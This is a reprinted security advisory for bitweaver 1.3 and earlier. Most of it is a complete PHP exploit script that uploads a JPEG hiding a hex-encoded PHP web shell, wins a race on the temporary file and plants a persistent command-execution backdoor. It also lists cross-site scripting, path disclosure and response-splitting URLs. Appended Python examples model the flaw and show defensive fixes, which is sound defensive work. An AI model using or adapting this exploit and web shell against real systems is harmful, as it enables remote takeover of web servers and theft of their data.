Details : SecurityAlert

  Topic : bitweaver <= v1.3 multiple vulnerabilities
  SecurityAlert : 1115
  CVE : CVE-2006-3105
  CVE : CVE-2006-3104
  CVE : CVE-2006-3103
  CVE : CVE-2006-3102
  SecurityRisk : Medium
  Remote Exploit : Yes
  Local Exploit : No
  Exploit Given : Yes
  Credit : rgod
  Published : 23.06.2006

  Affected Software : bitweaver <= v1.3

  Advisory Text :

```php
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "bitweaver <= v1.3 'tmpImagePath' attachment mod_mime exploit\r\n";
echo "by rgod rgod (at) autistici (dot) org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "dork: \"powered by bitweaver\"\r\n\r\n";
if ($argc<4) {
  echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
  echo "host: target server (ip/hostname)\r\n";
  echo "path: path to bitweaver\r\n";
  echo "cmd: a shell command\r\n";
  echo "Options:\r\n";
  echo " -p[port]: specify a port other than 80\r\n";
  echo " -P[ip:port]: specify a proxy\r\n";
  echo "Examples:\r\n";
  echo "php ".$argv[0]." localhost /bitweaver/ cat ./../../kernel/config_inc.php\r\n";
  echo "php ".$argv[0]." localhost /bitweaver/ ls -la -p81\r\n";
  echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n\r\n";
  die;
}

/*
software site: http://www.bitweaver.org/articles/

i)
vulnerable code in articles/BitArticle.php near lines 456-478:

...
if( !empty( $_FILES['article_image']['name'] ) ) {
  // store the image in temp/articles/
  $tmpImagePath = TEMP_PKG_PATH.ARTICLES_PKG_NAME.'/'.'temp_'.$_FILES['article_image']['name'];
  $tmpImageName = preg_replace( "/(.*)\..*?$/", "$1", $_FILES['article_image']['name'] );
  if( !is_dir( TEMP_PKG_PATH.ARTICLES_PKG_NAME ) ) {
    mkdir( TEMP_PKG_PATH.ARTICLES_PKG_NAME );
  }
  if( !move_uploaded_file( $_FILES['article_image']['tmp_name'], $tmpImagePath ) ) {
    $this->mErrors['article_image'] = "Error during attachment of article image";
  } else {
    $resizeFunc = ( $gBitSystem->getPreference( 'image_processor' ) == 'imagick' ) ? 'liberty_imagick_resize_image' : 'liberty_gd_resize_image';
    $pFileHash['source_file'] = $tmpImagePath;
    $pFileHash['dest_path'] = TEMP_PKG_NAME.'/'.ARTICLES_PKG_NAME.'/';
    // remove the extension
    $pFileHash['dest_base_name'] = $tmpImageName;
    $pFileHash['max_width'] = ARTICLE_TOPIC_THUMBNAIL_SIZE;
    $pFileHash['max_height'] = ARTICLE_TOPIC_THUMBNAIL_SIZE;
    $pFileHash['type'] = $_FILES['article_image']['type'];
    if( !( $resizeFunc( $pFileHash ) ) ) {
      $this->mErrors[] = 'Error while resizing article image';
    }
    @unlink( $tmpImagePath );
...

explanation:

a remote user can go to:

http://[target]/[path]/articles/edit.php

to submit an article to the administrator; you can attach an image there.
You can submit a file like this, with a double extension:

suntzu1234.php.xxx

a temporary copy of the file is created in the temp/articles/ folder and
renamed like this:

temp_suntzu1234.php.xxx

(see the $tmpImagePath argument...)

you have about 0.1 / 0.2 seconds to launch commands :), because the
temporary file is deleted

http://[target]/[path]/temp/articles/temp_suntzu1234.php.xxx?cmd=dir

this works fine on most Apache servers...

note: this folder is not properly protected, we have an .htaccess file like
this:

<FilesMatch "\.ph(p(3|4)?|tml)$">
order deny,allow
deny from all
</FilesMatch>

ii) two cross site scripting vulnerabilities:

http://[target]/[path_to_bitweaver]/users/login.php?error=<script>alert(document.cookie)</script>

http://[target]/[path_to_bitweaver]/articles/index.php?feedback=<script>alert(document.cookie)</script>

iii) a trick to see bitweaver's "white screen of death":

http://[target]/[path_to_bitweaver]/users/index.php?sort_mode=suntzuuuuuuuuuuuuu

which discloses the full application path, the database table prefix and
other things...

iv) various http response splitting vulnerabilities, this is one:

http://[target]/[path]/index.php?BWSESSION=%0d%0a[http headers]

this is the exploit for i), it creates a backdoor called suntzu.php.xxx in
temp/articles/ when you succeed for the first time
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    {$result.=" .";}
    else
    {$result.=" ".$string[$i];}
    if (strlen(dechex(ord($string[$i])))==2)
    {$exa.=" ".dechex(ord($string[$i]));}
    else
    {$exa.=" 0".dechex(ord($string[$i]));}
    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
  return $exa."\r\n".$result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function make_seed()
{
  list($usec, $sec) = explode(' ', microtime());
  return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
for ($i=3; $i<=$argc-1; $i++){
  $temp=$argv[$i][0].$argv[$i][1];
  if (($temp<>"-p") and ($temp<>"-P"))
  {$cmd.=" ".$argv[$i];}
  if ($temp=="-p")
  {
    $port=str_replace("-p","",$argv[$i]);
  }
  if ($temp=="-P")
  {
    $proxy=str_replace("-P","",$argv[$i]);
  }
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$packet="GET ".$p."temp/articles/suntzu.php.xxx HTTP/1.0\r\n";
$packet.="User-Agent: GoogleBot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"*delim*"))
{ echo "Exploit succeeded...\r\n";
  $temp=explode("*delim*",$html);
  die($temp[1]);
}

$shell=
chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0xc0).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).
chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).
chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).
chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).
chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).
chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).
chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).
chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).
chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x24).
chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).
chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).
chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).
chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x22).
chr(0x3b).chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).
chr(0x75).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).
chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).
chr(0x3b).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x2a).
chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x22).chr(0x3b).
chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).chr(0x3d).chr(0x66).chr(0x6f).
chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).chr(0x73).chr(0x75).chr(0x6e).
chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).chr(0x2e).
chr(0x78).chr(0x78).chr(0x78).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).
chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).
chr(0x73).chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).
chr(0x3f).chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).
chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).
chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).
chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).
chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).
chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).
chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).
chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).
chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).
chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).
chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).
chr(0x65).chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).
chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).
chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).
chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).chr(0x69).
chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).chr(0x70).chr(0x61).chr(0x73).
chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).chr(0x24).
chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).chr(0x63).
chr(0x68).chr(0x6f).chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).chr(0x65).
chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).chr(0x3f).
chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x63).
chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).chr(0x24).chr(0x66).chr(0x70).
chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).chr(0x68).chr(0x6d).chr(0x6f).
chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).
chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).chr(0x2e).chr(0x78).chr(0x78).
chr(0x78).chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).
chr(0x0d).chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).
chr(0x4a).chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).
chr(0x00).chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).
chr(0x00).chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0xff).chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).
chr(0x01).chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).
chr(0x03).chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).
chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x08).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).
chr(0xc4).chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).
chr(0x00).chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).
chr(0x03).chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).
chr(0x3f).chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).
chr(0x00).chr(0x00);

/*
this image has this code inside as EXIF metadata:

<?php
error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo "*delim*";passthru($_COOKIE[cmd]);echo "*delim*";
$fp=fopen("suntzu.php.xxx","w");
fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo \"*delim*\";passthru(\$_COOKIE[cmd]);echo \"*delim*\";?>");
fclose($fp);
chmod("suntzu.php.xxx",777);
?>
*/

srand(make_seed());
$anumber = rand(1,99999);
$data='-----------------------------7d63b53760260
Content-Disposition: form-data; name="tk"


-----------------------------7d63b53760260
Content-Disposition: form-data; name="article_id"


-----------------------------7d63b53760260
Content-Disposition: form-data; name="preview_image_url"


-----------------------------7d63b53760260
Content-Disposition: form-data; name="preview_image_path"


-----------------------------7d63b53760260
Content-Disposition: form-data; name="title"

test
-----------------------------7d63b53760260
Content-Disposition: form-data; name="author_name"

test
-----------------------------7d63b53760260
Content-Disposition: form-data; name="article_type_id"

1
-----------------------------7d63b53760260
Content-Disposition: form-data; name="rating"

3
-----------------------------7d63b53760260
Content-Disposition: form-data; name="format_guid"

tikiwiki
-----------------------------7d63b53760260
Content-Disposition: form-data; name="edit"

test
-----------------------------7d63b53760260
Content-Disposition: form-data; name="preview"

Preview
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publishDateInput"

1
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Month"

06
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Day"

15
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Year"

2006
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Hour"

22
-----------------------------7d63b53760260
Content-Disposition: form-data; name="publish_Minute"

33
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expireDateInput"

1
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Month"

06
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Day"

15
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Year"

2007
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Hour"

22
-----------------------------7d63b53760260
Content-Disposition: form-data; name="expire_Minute"

33
-----------------------------7d63b53760260
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------7d63b53760260
Content-Disposition: form-data; name="article_image"; filename="suntzu'.$anumber.'.php.xxx"
Content-Type:

'.$shell.'
-----------------------------7d63b53760260--
';

$packet="POST ".$p."/articles/edit.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."articles/edit.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63b53760260\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: GoogleBot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
if ($proxy=="")
{$ffpp=fsockopen($host,$port);}
else
{
  $parts=explode(':',$proxy);
  $ffpp=fsockopen($parts[0],$parts[1]);
}
fputs($ffpp,$packet);//we don't need output, quickly look for temporary file...
$packet="GET ".$p."temp/articles/temp_suntzu".$anumber.".php.xxx HTTP/1.0\r\n";
$packet.="User-Agent: GoogleBot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n"; //through cookies...
$packet.="Connection: Close\r\n\r\n";
for ($i=0; $i<=99; $i++)
{
  sendpacketii($packet);
  if (strstr($html,"200 OK")){
    echo "temp_suntzu".$anumber.".php.xxx file found...\r\n";
    if (!strstr($html,"passthru")) //not executed as php code
    { echo "Exploit succeeded...\r\n";
      $temp=explode("*delim*",$html);
      die($temp[1]);
    }
    else
    {echo "Exploit failed...\r\n";}
  }
}
fclose($ffpp);
//if you are here...
echo "Exploit failed...";
?>
```

original url: http://retrogod.altervista.org/bitweaver_13_xpl.html
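Point i) of the advisory rests on two defender-side facts worth checking in isolation: Apache mod_mime evaluates every dot-separated suffix of a file name, so `temp_suntzu1234.php.xxx` is still handed to the PHP handler when `.php` is mapped with AddHandler, and the quoted `.htaccess` pattern is anchored at the end of the name, so it never matches such a file. The Python below is an added example, not part of rgod's advisory or of bitweaver: it models that multi-extension rule (a simplified model, not Apache's code), puts the advisory's `FilesMatch` pattern beside a corrected one, and builds a temporary file name the upload handler fully controls. All function names and the image allow-list are my assumptions.

```python
import os
import re
import secrets

# Extensions that an AddHandler-style PHP configuration maps to the PHP
# handler. Assumed for the model; adjust to the server's own AddHandler line.
HANDLER_EXTENSIONS = frozenset({"php", "php3", "php4", "phtml"})


def apache_selects_php_handler(filename, handler_exts=HANDLER_EXTENSIONS):
    """Simplified model of mod_mime multi-extension matching: if ANY suffix
    after the first dot is mapped to the PHP handler, the file is run as PHP,
    even when a later, unknown suffix (here .xxx) follows it."""
    base = os.path.basename(filename)
    suffixes = base.split(".")[1:]
    return any(s.lower() in handler_exts for s in suffixes)


# The <FilesMatch> pattern quoted in the advisory: the $ anchor means only
# names that END in a PHP extension are denied.
ADVISORY_FILESMATCH = re.compile(r"\.ph(p(3|4)?|tml)$")

# Hardened pattern: a PHP extension anywhere after a dot, followed either by
# another dot or by the end of the name, case-insensitively.
HARDENED_FILESMATCH = re.compile(r"\.ph(p(3|4)?|tml)(\.|$)", re.IGNORECASE)


def filesmatch_denies(pattern, filename):
    """Emulate '<FilesMatch ...> deny from all': True means the request is refused."""
    return pattern.search(os.path.basename(filename)) is not None


def uploaded_image_is_exposed(user_filename, filesmatch=ADVISORY_FILESMATCH):
    """The vulnerable pattern: the temp copy is named 'temp_' + the original
    name. Returns True when Apache would execute it AND the .htaccess does not
    block it, i.e. the window the advisory describes exists."""
    stored = "temp_" + os.path.basename(user_filename)
    return apache_selects_php_handler(stored) and not filesmatch_denies(filesmatch, stored)


ALLOWED_IMAGE_EXTENSIONS = frozenset({"jpg", "jpeg", "png", "gif"})  # assumed allow-list


def upload_extension_allowed(user_filename, allowed=ALLOWED_IMAGE_EXTENSIONS):
    """Only the final extension counts, and only if it is on the allow-list;
    'x.php.xxx' fails because 'xxx' is not an image extension."""
    ext = os.path.basename(user_filename).rsplit(".", 1)[-1].lower()
    return ext in allowed


def safe_temp_name(user_filename, allowed=ALLOWED_IMAGE_EXTENSIONS):
    """Build a temp file name the handler controls entirely: a random token plus
    a vetted extension. The user-supplied base name never reaches the disk."""
    if not upload_extension_allowed(user_filename, allowed):
        raise ValueError("upload extension not allowed")
    ext = os.path.basename(user_filename).rsplit(".", 1)[-1].lower()
    return f"temp_{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in ("suntzu1234.php.xxx", "holiday.jpg"):
        print(name, "exposed with advisory .htaccess:", uploaded_image_is_exposed(name),
              "| with hardened pattern:", uploaded_image_is_exposed(name, HARDENED_FILESMATCH))
```

The name fix and the `FilesMatch` fix are independent layers; a third, which the model does not need to show, is writing the temporary copy to a directory outside the document root, which removes the race window on the temp file altogether rather than shortening it.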
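Points ii) to iv) are all the same defect at different sinks: a request parameter reaches an HTTP header, an HTML page or a database query without encoding or validation. As an added example (not bitweaver's code; the allowed `sort_mode` names and all function names are assumptions of mine), the Python below shows the corresponding fixes in one place: refusing CR/LF in header values so `BWSESSION=%0d%0a...` cannot start a second header, HTML-escaping reflected `error` / `feedback` text, and allow-listing `sort_mode` so an unknown value is replaced before it can produce the verbose error page.

```python
import html
from urllib.parse import unquote

# Assumed allow-list for the users listing; the real column names are not
# given in the advisory.
ALLOWED_SORT_MODES = frozenset({"login_asc", "login_desc", "real_name_asc", "real_name_desc"})


class HeaderInjection(ValueError):
    """Raised when a header value would let the client start a new header or the body."""


def header_value_is_safe(value):
    """CR, LF and NUL are the characters that turn one header into several."""
    return not any(c in value for c in "\r\n\x00")


def build_header(name, value):
    """Return a single 'Name: value' line or refuse to build it at all."""
    if not header_value_is_safe(value):
        raise HeaderInjection(f"control character in value of {name}")
    return f"{name}: {value}"


def session_cookie_header(session_id):
    """Case iv): a session id taken from the request is echoed into Set-Cookie.
    The value is validated before it is placed in the header."""
    return build_header("Set-Cookie", f"BWSESSION={session_id}; Path=/; HttpOnly")


def render_message(message):
    """Case ii): reflect the 'error' / 'feedback' parameter with every
    HTML-significant character encoded, so a <script> payload is displayed,
    not executed."""
    return '<div class="msg">' + html.escape(message, quote=True) + "</div>"


def render_query_param(raw_query_value):
    """URL-decode exactly once (the server normally does this), then escape."""
    return render_message(unquote(raw_query_value))


def select_sort_mode(requested, default="login_asc"):
    """Case iii): an unknown sort_mode never reaches the query layer (and its
    error page that leaks the install path and table prefix); it falls back
    to a known default."""
    return requested if requested in ALLOWED_SORT_MODES else default


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory's three payload shapes.
    print(render_query_param("%3Cscript%3Ealert(document.cookie)%3C/script%3E"))
    print(select_sort_mode("suntzuuuuuuuuuuuuu"))
    try:
        session_cookie_header(unquote("%0d%0aSet-Cookie: admin=1"))
    except HeaderInjection as e:
        print("rejected:", e)
```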
